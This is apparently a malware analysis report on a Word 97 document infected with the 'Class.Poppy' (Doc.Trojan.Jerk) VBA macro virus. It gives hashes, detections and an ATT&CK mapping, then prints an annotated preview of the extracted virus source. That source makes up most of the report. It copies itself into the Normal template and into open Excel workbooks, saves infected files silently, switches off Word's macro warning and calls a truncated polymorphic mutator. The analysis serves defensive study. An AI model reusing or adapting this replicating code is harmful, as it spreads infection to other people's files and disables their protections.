Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2634dc2379cf34b4…

MALICIOUS

Office (OLE)

Size: 41.0 KB · Created: 1999-02-09 18:43:00 · Authoring application: Microsoft Word 8.0 (Word 97) · First seen: 2012-06-14
MD5: 0941d930cf2e43ed2db8cca78fdb047d SHA-1: be311e34510f649d0d924831e455e3c55558411b SHA-256: 2634dc2379cf34b46b3a41cb296ffc5f93266028eadf00f76d602faa04a57f08
Risk score: 180

Malware Insights

MITRE ATT&CK
T1059.005 — Command and Scripting Interpreter: Visual Basic

The sample is a Word 8.0 (Word 97) document carrying a VBA macro virus that names itself "Class.Poppy" in its message-box title. On Document_Close it copies its own module source into the Normal template, or from an already-infected Normal template into the active document, so that documents opened or saved afterwards become carriers; it also sets Options.VirusProtection = False to suppress Word's macro warning. A Workbook_Deactivate handler together with InfectExcel/InfectWord helpers gives it a cross-application (Word ⇄ Excel) infection path, and a PolyIt routine, invoked by reference on roughly one in ten infections, appears to be a polymorphic mutator (its body is truncated in the preview). The GetObject call flagged by the heuristics and the ClamAV signatures Doc.Trojan.Jerk-7 (on the container) and Doc.Trojan.Jerk-4 (on the extracted macro) corroborate the verdict. The primary technique observed is code execution through Visual Basic for Applications (VBA), ATT&CK T1059.005.

Heuristics 3

  • ClamAV: Doc.Trojan.Jerk-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Jerk-7
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29832 bytes
SHA-256: ca1059069d2b01441992439d547dabaade25b0ec03af917fcec107d7d70f13a7
Detection
ClamAV: Doc.Trojan.Jerk-4
Obfuscation or payload: unlikely (tool verdict; note, however, that the extracted source contains a PolyIt routine called on a random branch from Document_Close, which suggests a polymorphic variant generator — see the preview below)
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
































Private Sub Workbook_Deactivate()
' Excel-side replication routine of this cross-application macro virus.
' (Header comment kept below the signature line on purpose: module line 33 is
' the signature, and the ReplaceLine calls further down rely on that offset.)
' Runs when the infected workbook loses focus. Copies this module's complete
' source into every still-empty code module of every open workbook, then
' rewrites the copied entry point so it hooks the target's Deactivate events.
' No parameters, no return value; every error is suppressed (Resume Next).

On Error Resume Next

' Named aliases for plain literals; presumably meant to defeat naive
' byte-signature matching rather than serve any functional purpose.
Const One = 1, Truex = True, Falsex = False, Zero = 0

' Note: VBA applies the "As" type only to the last name in each Dim, so
' OurCode and CounterI are actually Variant.
Dim OurCode, ThaClass As String
Dim CounterI, CounterJ As Integer
Dim SaveDocument As Boolean

ThaClass = "ThisWorkbook"

' Read the complete text of this workbook's first VBComponent — the virus body.
' (On current Office this requires "Trust access to the VBA project object
' model"; without it the call fails and Resume Next leaves OurCode empty.)
OurCode = Application.ThisWorkbook.VBProject.VBComponents.Item(One).CodeModule.Lines(1, Application.ThisWorkbook.VBProject.VBComponents.Item(One).CodeModule.CountOfLines)

' Hand the body to the Word infector (InfectWord is not within the visible preview).
Call InfectWord(OurCode)

' Visit every open workbook ...
For CounterI = One To Application.Workbooks.Count
  
  SaveDocument = Falsex
  
  ' ... and every VBA component whose module is still empty (i.e. not yet infected).
  For CounterJ = One To Application.Workbooks.Item(CounterI).VBProject.VBComponents.Count
  
    If Application.Workbooks.Item(CounterI).VBProject.VBComponents.Item(CounterJ).CodeModule.CountOfLines = Zero Then
   
      ' Mark the workbook for an immediate silent re-save only if it already
      ' lives on disk (non-empty Path, presumably) and has no unsaved changes.
      If Application.Workbooks.Item(CounterI).Path <> "" And Application.Workbooks.Item(CounterI).Saved = Truex And SaveDocument = Falsex Then SaveDocument = Truex
   
      ' Inject the entire virus body at line 1 of the empty module.
      Application.Workbooks.Item(CounterI).VBProject.VBComponents.Item(CounterJ).CodeModule.InsertLines One, OurCode
      
      ' Module line 33 of the injected body is the event-handler signature (the
      ' 32 blank lines preceding this Sub appear to be padding that fixes that
      ' offset). Rewrite it so the copy fires on Workbook_Deactivate in the
      ' ThisWorkbook component and on Worksheet_Deactivate in every other
      ' component (sheet modules, presumably).
      If Application.Workbooks.Item(CounterI).VBProject.VBComponents.Item(CounterJ).Name = ThaClass Then
        Application.Workbooks.Item(CounterI).VBProject.VBComponents.Item(CounterJ).CodeModule.ReplaceLine One * 33, "Private Sub Workbook_Deactivate()"
      Else
        Application.Workbooks.Item(CounterI).VBProject.VBComponents.Item(CounterJ).CodeModule.ReplaceLine One * 33, "Private Sub Worksheet_Deactivate()"
      End If

    End If
    
  Next CounterJ
  
  ' Persist the infection without prompting when the workbook was clean on entry;
  ' a dirty workbook is left for the user's own save.
  If SaveDocument = Truex Then Application.Workbooks.Item(CounterI).Save

Next CounterI

End Sub

Private Sub Document_Close()
' Word-side replication routine; runs on the Document_Close event.
' Infects in exactly one direction per run: an infected document seeds the
' Normal template, or an infected Normal template seeds a clean document.
' Also carries the visible payload (a message box), disables Word's macro
' warning, and hands the body to the Excel infector. No parameters, no
' return value; every error is suppressed (Resume Next).

On Error Resume Next

' Aliases for literals and Word enum members (wdFormatDocument / wdFormatTemplate);
' presumably intended to hinder signature matching, no functional effect.
Const Truex = True, Falsex = False, Zero = 0, One = 1, wdFormatDocumentx = wdFormatDocument, wdFormatTemplatex = wdFormatTemplate, DoubleDot = ":"

' Note: VBA applies the "As" type only to the last name in each Dim; the
' earlier names in each line are Variant.
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim activedoc, normaltmp As Object
Dim ActiveDocName, OurCode As String

' Payload: on the 14th of any month from June onward, insult the current user by
' name. The message-box title "Class.Poppy" is the family's self-identification.
If Day(Now) = 14 And Month(Now) > 5 Then MsgBox "I think " & Application.UserName & " is a big stupid jerk!", 0, "Class.Poppy"

' First VBComponent (code module) of the active document and of the Normal template.
Set activedoc = ActiveDocument.VBProject.VBComponents.Item(One)
Set normaltmp = NormalTemplate.VBProject.VBComponents.Item(One)

' Seed Rnd for the PolyIt decision below.
Randomize

DocumentInfected = Falsex
NormalTemplateInfected = Falsex

' A non-empty first module is treated as "already infected".
If activedoc.CodeModule.CountOfLines <> Zero Then DocumentInfected = Truex
If normaltmp.CodeModule.CountOfLines <> Zero Then NormalTemplateInfected = Truex

' Switch off Word's built-in macro virus protection (the macro-warning prompt of
' the Word 97/2000 object model) so later opens of infected files do not warn.
Options.VirusProtection = Falsex

' Proceed only when exactly one side is infected (Xor) and the document is saved
' in a macro-capable format (.doc or .dot).
If (DocumentInfected = Truex Xor NormalTemplateInfected = Truex) And (ActiveDocument.SaveFormat = wdFormatDocumentx Or ActiveDocument.SaveFormat = wdFormatTemplatex) Then
   
  ' Direction 1: infected document -> Normal template.
  If DocumentInfected = Truex Then
  
    ' Remember whether Normal had no unsaved changes, so it can be re-saved quietly.
    SaveNormalTemplate = NormalTemplate.Saved
  
    ' The complete virus body from this document's first module.
    OurCode = activedoc.CodeModule.Lines(One, activedoc.CodeModule.CountOfLines)
    
    ' AppendLog is not within the visible preview.
    Call AppendLog(OurCode)
    ' Int(Rnd * 10) is uniform over 0..9, so PolyIt (ByRef, presumably a
    ' polymorphic mutator; body truncated in the preview) runs on about 1 in 10 infections.
    If Int(Rnd * 10 * One) = One * 7 Then Call PolyIt(OurCode)
    ' Cross-infect Excel; InfectExcel is not within the visible preview.
    Call InfectExcel(OurCode)

    ' Inject the body at line 1 of the Normal template's module.
    normaltmp.CodeModule.InsertLines One, OurCode
    
    If SaveNormalTemplate = Truex Then NormalTemplate.Save
    
  End If


  ' Direction 2: infected Normal template -> document. The second character of the
  ' full name is ":" for a drive-letter path (a file that exists on disk); a document
  ' that is not on disk is only infected when it has unsaved changes.
  ActiveDocName = Mid(ActiveDocument.FullName, 2, One)
  If NormalTemplateInfected = Truex And (ActiveDocName = DoubleDot Or ActiveDocument.Saved = Falsex) Then
  
    ' Remember whether the document was clean, so the write-back can be silent.
    SaveDocument = ActiveDocument.Saved
    
    ' The virus body as stored in the Normal template.
    OurCode = normaltmp.CodeModule.Lines(One, normaltmp.CodeModule.CountOfLines)
    
    ' Cross-infect Excel; InfectExcel is not within the visible preview.
    Call InfectExcel(OurCode)
    
    ' Inject the body at line 1 of the document's first module.
    activedoc.CodeModule.InsertLines One, OurCode
    
    ' Save immediately only if the document was clean on entry; a dirty document is
    ' left for the user's own save prompt.
    If SaveDocument = Truex Then ActiveDocument.Save
      
  End If
  
    
End If

End Sub


Private Sub PolyIt(ByRef OurCode As String)

On Error Resume Next

Const VarCount = 48, UpperLimit = 15, LowerLimit = 5, Asc
... (truncated)